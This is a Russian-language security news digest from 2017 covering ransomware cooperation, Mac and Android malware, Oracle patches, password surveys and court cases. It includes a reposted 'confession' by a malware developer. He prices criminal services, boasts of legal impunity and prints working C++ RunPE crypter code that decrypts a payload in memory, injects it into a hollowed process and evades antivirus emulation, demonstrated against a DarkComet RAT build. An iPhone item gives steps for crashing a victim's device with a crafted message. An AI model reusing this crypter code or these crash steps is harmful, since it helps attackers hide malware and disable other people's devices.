    В рамках деятельности против ransomware Check Point также объявил о своем сотрудничестве с Европолом, полицейским агентством Европейского союза, чтобы предоставлять организациям и индивидуальным пользователям необходимую информацию об этой растущей угрозе. Check Point и Европол опубликовали совместный отчет о программах-вымогателях «Ransomware: What You Need to Know», в котором показана стремительная эволюция ransomware от ранних вариантов типа Cryptolocker 2013 года, до современных резонансных угроз семейств Locky, CryptXXX, TorrentLocker, Jigsaw и Cerber.

    В отчете описываются конкретные методы атак для программ из каждого семейства, а также доступные инструменты дешифровки, которые помогут подвергшимся нападению компаниям и владельцам ПК разблокировать свои данные. Он также дает подробные практические рекомендации, которые позволят предотвратить заражение компьютеров программами-вымогателями, а также инструкции о том, как реагировать на атаку и устранить ее последствия.

    Скачать совместный отчет Check Point и Европол можно посмотреть https://www.europol.europa.eu/sites/default/files/documents/ransomware-what_you_need_to_know.pdf

    Василий Дягилев, глава представительства Check Point Software Technologies в России и СНГ, комментирует: «Тесное сотрудничество между ИБ-компаниями и международными правоохранительными агентствами критически важно в борьбе с ransomware — оно поможет смягчить последствия крупномасштабных атак. В рамках проекта No More Ransom и сотрудничества с Европолом Check Point помогает разрабатывать новые решения для нейтрализации программ-вымогателей, передавая свой опыт работы и техническую компетенцию в сфере кибербезопасности».

    orig: 2017-01-20 08:45:40 / http://www.iso27000.ru/antivirusnyi-vestnik/check-point-software-technologies-prisoedinilsya-k-globalnomu-proektu-no-more-ransom-protiv-kibervymogatelei (click post title)



    [Из песочницы] По ту сторону баррикад вредоносного ПО. Исповедь малварщика

    Приветствую, %хабраюзер%. Решил ненадолго оторваться от форумных войн и работы, написав на Хабр статью о вредоносном ПО. Но статья эта будет необычная, так сказать — по другую сторону баррикад. Так уж сложилось, что на жизнь зарабатываю разработкой ПО. Вредоносного.

    Заранее скажу:

    Я не работаю по RU и СНГ в частности, а значит, чист перед законом. Не надо меня тыкать в УК РФ, его знаю отлично и не нарушаю. Такое у нас УПК, что не считает нарушением 272/273, если не причинило вред Российской Федерации. Таким образом, я отказываюсь от ответственности от сказанного мною тут, а также не несу никакой ответственности за причиненные действия после прочтения этой статьи. И вообще — я завязал. Я добрый, хольте и лелейте.

    Итак, приступим.

    Начну с того, кто и зачем пишет вредоносное ПО.

    Вместо вступления. Зачем же это все?
    Начну со своей истории. Я начал программирование с написания вредоносного ПО, как и многие в этой сфере. Именно поэтому так часто встречаются глупые вредоносы, которые только портят, либо содержат столько ошибок, что компьютер вообще отказывается дальше работать. Побудил меня интерес к этому, когда я поймал подобную малварь. Ну, и собственное эго — начал я с таких же портящих систему вредоносов.

    Позврослев и набравшись опыта, я понял, что на этом можно зарабатывать. Об этом я и хочу поговорить в первой части статьи.

    Как используют вредоносное ПО?
    Начнем с самого безобидного.

    I) Clickfraud, мошенничество с кликами, или, как мы говорим — кликботы. Для чего это надо? Ну, представим, что вы некая рекламная фирма, и вам платят за переходы. Другими словами за траффик. И тут два пути:

    1) Либо этот траффик добыть честным путем, рекламой;
    2) Либо просто «попросить» вредоноса (мне не нравится, честно говоря, слово вредонос) перейти на сайт. Хорошие кликботы умеют эмулировать javascript и кликать по экрану, что очень сложно отфильтровать.

    Как мы понимаем, реклама дорога, и ботнет на базе кликбота очень хорошо окупается.

    Примером является P2P-ботнет на базе ZeroAccess.

    II) Переходим к более агрессивному софту, майнинг. Думаю, не нужно местному сообществу объяснять, что такое майнинг. Просто скажу цифру: 9 USD/day с ~120 онлайна серверных систем на майнинге Altcoin.

    Пример: ZeroAccess для майнинга Bitcoin.

    Неплохо, да? Но это все неинтересно, идем дальше.

    III) Загрузки. Вот мы и подошли к тому, про что обычное IT-сообщество не знает. Как обычно говорят аверы — Trojan-Downloader, а мы будем говорить по простому — лоадер. Так вот, лоадер — это такая штука, которая служит для скачивания и запуска другой малвари. Они бывают нерезидентными и резидентными. Поговорим про второе, ибо это наиболее интересно. Что обычно делает человек, использующий малварь для своих благих целей? Он ищет где бы достать лоады (загрузки) на компьютеры пользователей. И идет он к адверту (человек, который грузит софт). Адверт использует лоадер для загрузки софта этого человека на компьютеры пользователей.

    Обычные расценки:

    US — 600$/1к лоадов
    UK — 400$/1к лоадов
    Микс мира — 100$/1к лоадов
    Микс Азии — 75$/1к лоадов.

    Эти цены взяты у одного из таких адвертов.

    Пример: Smoke Loader.

    IV) Банкботы. Вот мы и подошли к кардерам, которые воруют денюшку иу людишек.

    Начнем с банкботов.

    Как работает банкбот?

    Попадая на компьютер пользователя он инжектит код (внедряет в адресное пространство процесса) в браузеры, ставит хуки на апишки для работы с сетью (перехватывает функции отправки/получения данных с сети), после чего производит подмену выдачи (разговорное: веб-инжекты, инжи, инжекты). Т.е, например, заходит пользователь в онлайн банк, а у него вместо формы от банка подменяется код на форму, которая совершает автоматический перевод после ввода данных авторизации (автозаливы). Это простейший вариант; разумеется, существуют разные антифрод системы в банках и прочие способы защиты. Но и есть способы их обхода.

    Суммы, получаемые кардерами, можете представить сами.

    Пример: Zeus, SpyEye.

    V) Криптолокеры. Наконец, мы подошли к самому низкому — криптолокерам. Данный софт шифрует все на винте и требует выкуп. Наиболее профессиональные работают следующим образом:

    При старте проверяют запущены ли они в СНГ (обычно по раскладке) и, если запущены, то завершаются. Это не шутка, так и есть, примеры: Cerber Locker.

    Ну да ладно, это профессионализм в целях безопасности своей же, но мы рассмотрим то, как они умудряются все пошифровать, да так, что не расшифруешь.

    Для каждого файла генерируется уникальный AES-256 ключ, который шифруется глобальным публичным RSA-2048 ключем, а приватная часть удаляется из памяти и отправляется на сервер для хранения. Сделано это для того, чтобы увеличить скорость шифрования, ибо RSA — слишком медленный алгоритм, а AES-CBC шифрует довольно быстро. Чтобы расшифровать потребуются сотни лет со всей вычислительной мощности, либо приватный ключ с сервера для расшифровки ключа AES, который отправляется в автоматическом режиме при получении оплаты на уникальный для бота bitcoin-адрес. Именно так работает Cerber Locker. По данным исследователей (гуглится легко) авторы цербера заработали около $2 млн за год. На деле чуть меньше миллиона, так как распространяется этот софт засчет адвертов, которым уходит 50% (на одном из форумов висит их партнерская программа).

    Вместо основной части. Как происходит управление ботнетом?
    Разумеется, мы должны как-то всем этим управлять. Для этого используются чаще всего C&C-серверы (Command and control). Боты просто при старте подключаются к серверу и ждут оттуда команды. Разумеется, приходят абузы и сервер наглым образом блочат, но и от этого есть панацея. Можно использовать DGA (алгоритм генерации доменов), либо хостинг в .onion зоне (проще говоря в торе). Отличное антиабузное решение. Сейчас наблюдается интересная тенденция в использовании namecoin, он же blockchain для dns. Так что с прогрессом прятать ботнеты становится все проще, а защита только слабеет.А как же с обходами антивирусов?
    Для начала поговорим о уровнях защиты: scantime, runtime. Другими словами, во время сканирования и во время работы. К первому относится сигнатурный анализ и эвристический, а ко второму — проактивные технологии.

    Все это обходится достаточно просто. Эвристика ищет подозрительные вызовы API и имена в таблице импорта, а мы можем просто использовать динамический импорт функций через самописную GetProcAddress функцию и различные техники антиэмуляции. До недавнего времени KIS не умел эмулировать последнюю ошибку API функций и его легко было пустить по ложному следу, сейчас это почему-то перестало помогать. Пока не расковырял, увы.

    Для обхода сигнатурного детекта уже старых вредоносов используются крипторы. По простому, это обычные упаковщики/протекторы, но нужны для другого — расшифровать зашифрованный код в памяти и запустить его подобно загрузчику Windows. Так действуют LoadPE-крипторы.

    С проактивными сложнее и обходятся исключительно разрывом шаблона поведения, нужно вести себя так, как будто ты белый и пушистый.

    Пример кода из RunPE криптора, расшифрующего малварь в памяти и внедряющего его в копию своего процесса
    void Decrypt(PCHAR str, DWORD size)
    {
    	int j = 2;
    	OpenProcess(0, 0, 0);
    	for (DWORD i = 0; i < size; i++)
    	{
    		if ((i % 1024 == 0) && (fact(j) != j))
    			ExitProcess(0);
    		str[i] ^= (xor_key - GetLastError());
    		str[i] -= (fact(j + 1) - fact(j) * fact(j));
    	}
    }
    
    
    void __cdecl memset_mm(void *data, char byte, DWORD size)
    {
    	for (unsigned int i = 0; i < size; i++)
    		((char*)data)[i] = byte;
    }
    
    
    void run(LPSTR szFilePath, PVOID pFile)
    {
    	PIMAGE_DOS_HEADER IDH;
    	PIMAGE_NT_HEADERS INH;
    	PIMAGE_SECTION_HEADER ISH;
    	PROCESS_INFORMATION PI;
    	STARTUPINFOA SI;
    
    	memset_mm(&PI, 0, sizeof(PI));
    	memset_mm(&SI, 0, sizeof(SI));
    	PCONTEXT CTX;
    	NtUnmapViewOfSection xNtUnmapViewOfSection;
    	LPVOID pImageBase;
    	int Count;
    	IDH = PIMAGE_DOS_HEADER(pFile);
    	if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
    	{
    		INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
    		if (INH->Signature == IMAGE_NT_SIGNATURE)
    		{
    			if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
    			{
    				CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
    				CTX->ContextFlags = CONTEXT_FULL;
    				if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
    				{
    					xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
    					xNtUnmapViewOfSection(PI.hProcess, PVOID(INH->OptionalHeader.ImageBase));
    					pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
    					if (pImageBase)
    					{
    						WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
    						for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
    						{
    							ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
    							WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
    						}
    						WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
    						CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
    						SetThreadContext(PI.hThread, LPCONTEXT(CTX));
    						ResumeThread(PI.hThread);
    					}
    
    				}
    			}
    		}
    	}
    	VirtualFree(pFile, 0, MEM_RELEASE);
    }
    
    
    void Decryption()
    {
    	PCHAR Self = (PCHAR)VirtualAlloc(0, 256, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    	if (!Self)
    		ExitProcess(0);
    	GetModuleFileNameA(0, Self, 256);
    
    	Decrypt((PCHAR)&Buf[0], size);
    	
    	run(Self, Buf);
    	ExitProcess(0);
    }
    
    


    В примере в качестве ключа используется LastError от неверного вызова функции OpenProcess. Спасал раньше от KIS и других, сейчас как-то не очень. Видимо эмулятор дописали по-нормальному.
    void Decrypt(PCHAR str, DWORD size)
    {
    	int j = 2;
    	OpenProcess(0, 0, 0);
    	for (DWORD i = 0; i < size; i++)
    	{
    		if ((i % 1024 == 0) && (fact(j) != j))
    			ExitProcess(0);
    		str[i] ^= (xor_key - GetLastError());
    		str[i] -= (fact(j + 1) - fact(j) * fact(j));
    	}
    }
    

    Несмотря на такой простой алгоритм, это помогает обойти большинство антивирусов, убрав эвристические и сигнатурные детекты.

    Не верите? Ок.

    Давайте посмотрим на результат сканирования малвари DarkComet RAT.

    Билд DarkComet'а некриптованный

    А теперь накроем его криптором из под спойлера.билд DarkComet'а криптованный

    Результат интересный, из-за паники вокруг Zeus'а очень много ложных срабатываний из-за очень общих сигнатур на него. Разумеется, 1 детект — это ошибка скорее, а не достижение.Вместо заключения. Как защититься?
    Рекламировать особенные продукты не буду, но они есть. И этот продукт бесплатен.

    1) Поставьте линукс

    1) Используйте решения класса Internet Security (Total Security);
    2) Используйте фаерволлы;
    3) UAC на максимальный уровень (хотя это легко обходится), пароль на админа 40 символов и сидите из под юзера;
    4) NoScript плагин для браузера, измененный UserAgent под Linux и Chrome для неверной идентификации браузера.

    На этом у меня все.

    orig: 2017-01-20 08:26:42 / https://habrahabr.ru/post/319992/ (click post title)



    Обнаружен новый бэкдор для Mac с устаревшим кодом

    Вредоносное ПО было создано несколько лет назад, однако обнаружили его только сейчас.

    Эксперты компании Malwarebytes сообщили о первом обнаруженном в 2017 году вредоносном ПО для Mac. Бэкдор Quimitchin использует устаревший код и атакует медицинские исследовательские лаборатории.

    По всей видимости, вредоносное ПО было создано несколько лет назад, однако обнаружили его только сейчас. Это можно объяснить тем, что бэкдор использовался исключительно для целевых атак, а они осуществляются не так часто.

    Как отмечают эксперты, за последние несколько лет не раз появлялись сообщения о русских и китайских хакерах, атакующих американские исследовательские институты. Тем не менее, фактов, проливающих свет на создателей или распространителей Quimitchin, экспертам обнаружить не удалось. Поскольку вредонос использовался только в атаках на исследовательские лаборатории, наверняка его главной целью является кибершпионаж.

    Бэкдор был обнаружен, когда администратор зафиксировал подозрительный трафик, исходящий от одного из Mac. В Quimitchin реализованы устаревшие системные вызовы, использовавшиеся еще до появления OS X, а также библиотека libjpeg с открытым исходным кодом, в последний раз обновлявшаяся в 1998 году.

    Поскольку в оригинальном скрипте исследователи обнаружили команды оболочки Linux, они решили запустить бэкдор на Linux-машине. Как оказалось, практически все, за исключением кода Mach-O (формат исполняемых файлов в ОС от Apple), работало отлично. Эксперты допускают существование вариантов Quimitchin, предназначенных для Linux, где вместо Mach-O используется исполняемый файл Linux.

    Основными функциями вредоноса является похищение снимков экрана и доступ к web-камерам на зараженных Mac. Кроме того, бэкдор способен составлять карту локальной сети и предоставляет злоумышленникам возможность удаленно управлять ею.

    Apple назвала данное вредоносное ПО Fruitfly и пообещала вскоре выпустить решение безопасности для борьбы с ним.

    orig: 2017-01-20 08:10:34 / http://www.securitylab.ru/news/485082.php (click post title)



    Новый Android-троян незаметно скачивает приложения из Google Play

    Троян накручивает счетчик установок, искусственно повышая популярность приложений в Google Play.

    Специалисты компании «Доктор Веб» предупредили о появлении нового Android-трояна, способного внедряться в активный процесс Play Маркет и незаметно накручивать счетчик установок в каталоге Google Play.

    Вредонос, получивший название Android.Skyfin.1.origin (по классификации «Доктор Веб»), предположительно распространяется посредством других троянов-загрузчиков, которые после инфицирования мобильного устройства пытаются получить доступ с правами суперпользователя и скрыто установить дополнительное вредоносное ПО.

    Оказавшись на системе, Android.Skyfin.1.origin внедряет в процесс программы Play Маркет вспомогательный троянский модуль (Android.Skyfin.2.origin), который крадет различные данные, в том числе уникальный идентификатор мобильного гаджета и учетной записи его владельца, коды авторизации для подключения к каталогу Google Play и иную конфиденциальную информацию. Добытые сведения вместе с технической информацией об устройстве отправляются на управляющий сервер злоумышленников.

    При помощи собранных данных троян подключается к каталогу Google Play и имитирует работу приложения Play Маркет. Вредонос способен осуществлять поиск в каталоге, отправлять запросы на приобретение программ, подтверждать покупку, подтверждать согласие с условиями лицензионного соглашения, запрашивать ссылки для скачивания apk-файла из каталога, подтверждать скачивание приложения.

    Загруженные программы вредонос сохраняет на карту памяти, не устанавливая их. Тем самым троян повышает шансы избежать обнаружения и может продолжать накручивать счетчик установок, искусственно повышая популярность приложений в online-каталоге Google.

    orig: 2017-01-20 08:08:01 / http://www.securitylab.ru/news/485081.php (click post title)



    Oracle исправила 270 уязвимостей в своих продуктах

    Больше всего проблем с безопасностью исправлено в E-Business Suite Executive.

    Компания Oracle выпустила январские обновления для своих продуктов. Патчи исправляют 270 уязвимостей, более ста из которых можно проэксплуатировать удаленно без авторизации. Это значит, что, в зависимости от продукта, злоумышленник может либо удаленно осуществить атаку на него с помощью специального ПО, либо проэксплуатировать уязвимость, используя вредоносный web-сайт. В результате атакующий сможет без ведома жертвы выполнить на ее системе произвольные команды.

    Больше всего проблем с безопасностью Oracle исправила в двух продуктах – E-Business Suite Executive (121 уязвимость) и Financial Services Applications (37 уязвимостей). В Java было исправлено 17 проблем с безопасностью, и 16 из них можно проэксплуатировать удаленно.

    Помимо прочих продуктов, исправлен ряд уязвимостей в Oracle Database Server, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite, Oracle Industry Applications, Oracle Fusion Middleware, Oracle Sun Products, Oracle Java SE, and Oracle MySQL.

    Как сообщает Oracle, компания часто получает уведомления об эксплуатации уже исправленных уязвимостей, поскольку администраторы своевременно не устанавливают обновления. В связи с этим, рекомендуется применить патчи как можно скорее.

    orig: 2017-01-20 06:49:39 / http://www.securitylab.ru/news/485080.php (click post title)



    Информационная безопасность Д. Трампа

    Сегодня состоится церемония инаугурации 45-ого Президента США Дональда Трампа. В то время, как вокруг его персоны ходят противоречивые мнения, а предвыборные лозунги были разобраны на цитаты, нам хотелось бы обсудить его президентские намерения с точки зрения информационной безопасности.

    В своей предвыборной программе Трамп заявлял следующее:

  • Немедленно пересмотреть все американские средства защиты от кибератак и уязвимостей, в том числе критически важных объектов инфраструктуры. Поручить это Комитету по совершенствованию кибербезопасности.
  • Поручить Министерству юстиции США создать объединенные оперативные группы по всей территории США для координации федеральных, муниципальных и региональных правоохранительных органов по борьбе с киберугрозами;
  • Министру Обороны и Председателю Объединенного комитета начальников штабов выработать рекомендации для усиления кибер-командования США, с акцентом как на защите, так и нападении в киберпространстве;
  • Совершенствуясь в контратаках, сдерживать атаки как государственными, так и негосударственными структурами, чтобы при необходимости адекватно реагировать.
  • Специалисты считают, что Трамп воспринимает национальную безопасность крайне серьезно, и поэтому стоит особенно присмотреться к его действиям. Ему придется найти непростой компромисс в решениях по вопросам кибербезопасности, прислушиваясь к своим сильным военным советникам, и при этом сохранять концепцию «не закручивать гайки».

    Пока не ясно, как именно будет решён вопрос обеспечения национальной безопасности наравне с соблюдением Конституционных прав граждан США и сохранения тайны персональных данных. Из предвыборных лозунгов следует, что Трамп настроен весьма решительно, когда дело доходит до расследований дел исламских террористов, но готовы ли компании Силиконовой долины поддержать его?

    В каждом сюжете Bloomberg о кибербезопасности звучит вопрос о влиянии России на результаты президентских выборов. Многие в России считают, что Дональд Трамп — это начало дружбы с США, но вот на другом берегу Атлантики почему-то думают иначе (#russiansdidit).

    А что думаете вы, коллеги?

    Для вступления в дискуссию присоединяйтесь к нашему сообществу в социальных сетях:

    Facebook

    ВКонтакте

    Модуль: Аудит и Контроль

    Модуль предназначен для контроля, аудита и оценки соответствия организации различным нормативным и законодательным требованиям в области информационной безопасности.

    Модуль: Инциденты

    Модуль предназначен для организации процесса управления инцидентами информационной безопасности и анализа информации, относящейся к инциденту.

    С помощью модуля можно вести учет и регистрацию событий и инцидентов, хранить всю информацию по инцидентам и результатам их расследования в единой базе данных, а также подготавливать необходимую отчетность.

    Модуль: Риски

    Модуль предназначен для оценки и управления рисками информационной безопасности в соответствии с требованиями и рекомендациями российских и международных стандартов (ISO, OCTAVE, NIST, СТО БР, PCI DSS).

    С помощью модуля можно составить модель угроз, провести оценку и анализ рисков, сформировать план обработки рисков, оценить экономический эффект и обосновать бюджет на информационную безопасность.

    Модуль: Активы

    Модуль предназначен для организации управления ИТ-активами, сбора и визуализации детальной информации об ИТ-инфраструктуре и связях между элементами этой инфраструктуры, осуществления контроля за состоянием инфраструктуры.

    orig: 2017-01-20 06:08:14 / https://rvision.pro/blog-posts/informatsionnaya-bezopasnost-d-trampa/ (click post title)



    Вызвать отказ в обслуживании iPhone можно с помощью лишь двух эмодзи

    Эксперт представил два простейших способа выведения из строя iOS-устройств.

    На YouTube-канале EverythingApplePro появилось видео, демонстрирующее два новых способа, с помощью которых можно удаленно вызвать отказ в обслуживании iOS-устройства. Оба метода не требуют какого-либо участия со стороны жертвы и выводят гаджет из строя, как только она получит специально сформированное сообщение.

    Первый способ очень простой и требует лишь отправить на атакуемое устройство два эмодзи (белый флаг и радугу) и ноль (0). Как только жертва получит такое сообщение, ее устройство зависнет и через несколько минут перезагрузится. Уязвимость затрагивает версии iOS с 10.0 до 10.1.1.

    Как пояснил эксперт EverythingApplePro, Эмодзи в виде радужного флага состоит  из трех слоев – белого флага, символа под названием «изменение сектора 16» (variation sector 16, VS 16) и радуги. VS 16 «говорит» устройству объединить оба символа, чтобы получить третий. iOS пытается скомбинировать белый флаг, ноль и радугу в эмодзи в виде радужного флага, однако сделать это невозможно, из-за чего происходит сбой.

    Если скопировать данное сообщение и вставить в любое установленное на устройстве приложение, оно зависнет. Поэтому для того, чтобы отослать кому-то, нельзя вводить его непосредственно в поле для сообщений, иначе устройство отправителя зависнет.

    Обойти данную проблему можно, воспользовавшись компьютером. Нужно зайти на web-версию iCloud, вставить скопированный текст с эмодзи в заметки, а затем открыть заметки на мобильном устройстве и отправить в сообщении выбранной жертве. Примечательно, если пользователь получит сообщение с эмодзи на экране блокировки, ничего не произойдет.

    Второй способ работает на устройствах под управлением версий iOS с 10.0 до 10.21 и эффективен, даже если сообщение придет на экран блокировки. Для его осуществления на устройстве отправителя должен быть установлен iCloud Drive.

    Согласно видео, для начала нужно зайти на сайт preston 159.com, загрузить с него файл контакта в iCloud Drive и уже оттуда отправить его жертве в текстовом сообщении. По словам эксперта EverythingApplePro, файл содержит множество раз скопированное сообщение с вышеуказанными эмодзи и нолем. Как только устройство получает вредоносное сообщение, оно перестает отвечать на какие-либо действия пользователя.

    orig: 2017-01-20 06:02:26 / http://www.securitylab.ru/news/485079.php (click post title)



    Новая Android-угроза направлена на россиян

    Исследователь Кай Лю (Kai Lu) из Fortinet обнаружил новое семейство вымогательского ПО, нацеленного на Android. Блокер полностью закрывает доступ к экрану до тех пор, пока жертва не введет данные кредитной карты в специальном окне. Пока зловред атакует только русскоязычных пользователей и доступен только на русском языке. Он получил вердикт Android/Locker.FK!tr.

    Хотя блокер выглядит просто как еще один вымогатель в веренице себе подобных, он тем не менее имеет ряд особенностей. Ключевое его отличие от собратьев — неадекватный размер выкупа. Зловред требует за разблокировку смартфона целых 545 тыс. рублей, что многократно выше стоимости любого, даже премиального устройства, и жертве выгоднее просто купить новый смартфон вместо того, чтобы разблокировать старый.

    Второе отличие состоит в том, что жертве необходимо ввести номер кредитки прямо в поле на экране блокировки, тогда как другие вымогатели оперируют через биткойн-кошелек, анонимайзер Tor или даже подарочные карты.

    И наконец, вымогатель использует для работы платформу Google Cloud Messaging (GCM) — сервис Google для разработчиков Android, созданный для разгрузки серверов. Разработчик может отправлять данные со своего сервера в GCM, который, в свою очередь, отправляет данные всем зарегистрированным пользователям. Этот механизм действует и в обратном направлении. Таким же образом разработчики вымогателя снимают нагрузку со своего командного сервера.

    Связываясь с GCM, пораженные зловредом смартфоны регистрируются и получают уникальный идентификатор, который напрямую отправляется на командный сервер вымогателя. Чтобы доставить инструкции пострадавшим пользователям, злоумышленники просто распространяют их через GCM в виде PUSH-уведомлений. Операторы вымогателя могут посылать до 20 команд на зараженные хосты, в том числе команды блокировки и разблокировки устройства, добавления новых контактов в смартфон, кражи имеющихся контактов, отправки SMS-сообщений и обновления программного кода зловреда.

    Скорее всего, блокер попадает в смартфон через сторонние магазины приложений и запрашивает права администратора. Чтобы избавиться от зловреда, необходимо перезагрузить устройство в безопасном режиме и удалить приложение.

    Update. По словам эксперта «Лаборатории Касперского» Виктора Чебышева, данный Android-вымогатель в принципе не нов, «Лаборатория» детектирует его как Trojan-Ransom.AndroidOS.Small с ноября 2015 года. Использование облачного сервиса GCM Android-зловредами тоже уже наблюдалось, причем еще в 2013 году.

    «В целом за два года мы зафиксировали 7174 попытки заразить наших пользователей этим зловредом, – комментирует Чебышев. – Это немного на фоне других популярных зловредов. Однако примечательна карта попыток заражений. Больше всего заражений в России, но есть попытки и по всему миру».

    KL - Trojan-Ransom.AndroidOS.Small.v geography

    orig: 2017-01-20 05:47:07 / https://threatpost.ru/novaya-android-ugroza-napravlena-na-rossiyan/20173/ (click post title)



    Россияне по-прежнему беспечны с паролями

    Опрос, проведенный по заказу «Лаборатории Касперского», подтвердил, что россияне все еще не научились создавать и использовать надежные и сложные для взлома пароли. Каждый шестой интернет-пользователь в России хотя бы раз сталкивался с попыткой взлома онлайн-аккаунта по причине слабого пароля. Тем не менее россияне продолжают подвергать опасности свои личные и финансовые данные.

    Например, только 35% пользователей используют разные пароли для своих аккаунтов, остальные же используют ограниченное количество паролей, а 8% вообще используют для всех учетных записей одну и ту же комбинацию, жертвуя безопасностью в пользу удобства.

    Также российские пользователи не склонны заботиться об устойчивости паролей к взлому. Только 30% участников опроса используют в пароле буквы разных регистров, а спецсимволы — только 23%. Такой тренд идет вразрез с мнением респондентов о том, что сильные пароли критичны для безопасности аккаунтов в онлайн-банкинге (50%), соцсетях (34%) и онлайн-магазинах (31%).

    Кроме того, опрос выявил, что люди продолжают относиться к паролям небрежно: треть опрошенных дает свои пароли членам семьи, 9% респондентов — друзьям. 31% россиян записывают пароли на бумаге, чтобы не забыть. Другими словами, картина складывается безрадостная.

    Подобная ситуация не уникальна для России. Исследователи из Keeper Security проверили данные крупных утечек последнего времени и выяснили, что самым популярным паролем в 2016 году все еще являлся «123456», который даже не надо взламывать, так как его легко угадать. Этот пароль используют около 17% пользователей из почти 10 млн жертв последних утечек. Второй по популярности пароль более сложный, саркастически отмечают авторы исследования, — это «123456789», а за ним в порядке убывания следуют «qwerty», «12345678» и «111111». Другими «лидерами» являются «password», «123123», «123321», «google», «987654321» и «666666».

    Как показывали предыдущие исследования, пользователи склонны больше ценить удобство, нежели безопасность. Специалисты советуют использовать менеджеры паролей, чтобы не пришлось запоминать длинные и сложные пароли к каждому аккаунту.

    orig: 2017-01-20 05:42:49 / https://threatpost.ru/rossiyane-po-prezhnemu-bespechny-s-parolyami/20170/ (click post title)



    Хакер осужден за кибератаки на системы госструктур Новосибирска

    Новосибирец приговорен к одному году ограничения свободы.

    Октябрьский районный суд Новосибирска вынес обвинительный приговор в отношении местного жителя, осуществившего ряд хакерских атак на информационные системы органов власти Новосибирска, институтов СО РАН и госучреждений Алтайского края, передает информагентство «РИА Новости» со ссылкой на пресс-службу УФСБ по Новосибирской области.

    Как сообщается, в апреле 2016 года сотрудники ФСБ выявили и пресекли деятельность новосибирца, который при помощи вредоносного ПО осуществил хакерские атаки на сайт мэрии Новосибирска и ряд институтов Сибирского отделения РАН.

    Хакер был признан виновным по статье УК РФ «Создание, использование и распространение вредоносных компьютерных программ» и приговорен к одному году ограничения свободы.

    orig: 2017-01-20 05:29:44 / http://www.securitylab.ru/news/485078.php (click post title)



    Lock Your Mobile Devices

    The number one step for protecting your mobile device is making sure it has a strong passcode or password lock on it so only you can access it.

    orig: 2017-01-20 05:00:00 / http://securingthehuman.sans.org/u/c83 (click post title)



    Таганский суд поставил под угрозу пользователей лицензионного ПО

    Суд признал вредоносным ПО, которое таковым не является.

    Вердикт Таганского районного суда города Москвы поставил под угрозу миллионы пользователей лицензионного программного обеспечения, в том числе установленного на компьютерах Apple.

    По информации издания «Росбалт», в июне 2016 года Таганский районный суд столицы вынес обвинительный приговор в отношении бывшего системного администратора Алексея Старикова, приговорив его к одному году лишения свободы условно за использование вредоносного ПО, заведомо предназначенного для несанкционированного копирования. Речь идет о программах Time Machine, Lan Agent Standard и Security Curator.

    По мнению адвоката осужденного Дмитрия Соколова, приговор Таганского суда является незаконным, поскольку инстанция признала вредоносным программное обеспечение, которое таковым не является. Все три программы правомочно находились и находятся в гражданском обороте и свободной продаже на территории РФ. При вынесении приговора суд ошибочно трактовал критерии оценки вредоносности ПО, несмотря на полученное защитой заключение экспертов лаборатории аккредитованной Федеральной службой по техническому и экспортному контролю, определивших, что Time Machine, Lan Agent Standard и Security Curator не являются вредоносными и заведомо не предназначены для несанкционированных действий, указанных в ч.1 ст.273 УК РФ.

    Как считает защита Старикова, обвинение не предоставило ни одного доказательства по существу его вины, а именно, что вредоносные функции были заложены в техническое устройство программ при их создании, а также доказательств прямого умысла на использование вредоносных программ. Приговор пока не вступил в законную силу. Окончательно ситуация разрешится после того, как Московский городской суд рассмотрит апелляционные жалобы.

    Как полагает адвокат осужденного, если существующий приговор будет подтвержден вышестоящей инстанцией, это затронет интересы производителей ПО, у которых появится возможность обратиться с иском против России в суд и требовать компенсации за причиненные финансовые убытки и ущерб деловой репутации.

    orig: 2017-01-20 04:42:13 / http://www.securitylab.ru/news/485077.php (click post title)



    Чего не хватает российской нормативке или почему одна картинка говорит больше тысячи слов?

    Во вчерашней заметке про новые требования по безопасности SWIFT я упомянул, что отечественным регуляторам не хватает умения визуализировать свои требования и свои документы, что сильно затрудняет применение их на практике. Я уже писал про сложность восприятия документов ФСТЭК (тут, тут и тут), но сегодня я решил чуть раскрыть эту тему. Правда, уже с другой точки зрения, а точнее с точки зрения формата представления документов.

    Все мы знаем про три типа восприятия информации - аудиалы (восприятие на слух), визуалы (восприятие через глаза) и кинестетики (восприятие через ощущения и касания). На самом деле есть еще и очень редкий, четвертый тип - дискрет, воспринимающий информацию через цифры, четкие доводы и логическое осмысление. Но знание этих 4-х типов не сильно помогает нам ответить на вопрос, почему тексты российских регуляторов воспринимаются хуже, чем тех же американских. Ответ заключается в таком явлении как "эффект превосходства образа", то есть восприятии визуальных изображений на порядок лучше, чем восприятие текста и тем более устной речи. Даже таблицы, не говоря уже о цифрах или просто стене текста, сложны для восприятия и скучны; от них устаешь уже через пару страниц и смысл документа начинает ускользать от читателя. Спасением являются иллюстрации и изображения, поясняющие или раскрывающие смысл тех или иных положений, а также правильное использование типографики (шрифтов), цвета, визуального ряда и макета/дизайна.

    Приведу несколько фактов:

    Ну а дальше будет несколько примеров, по которым вы, сами для себя, может судить о том, насколько легко или тяжело воспринимать представленную информацию (возможно у меня глаз уже замылен и я привык к нашим НПА по ИБ, но российские документы бросаются в глаза мгновенно):

    PCI DSS v3.0
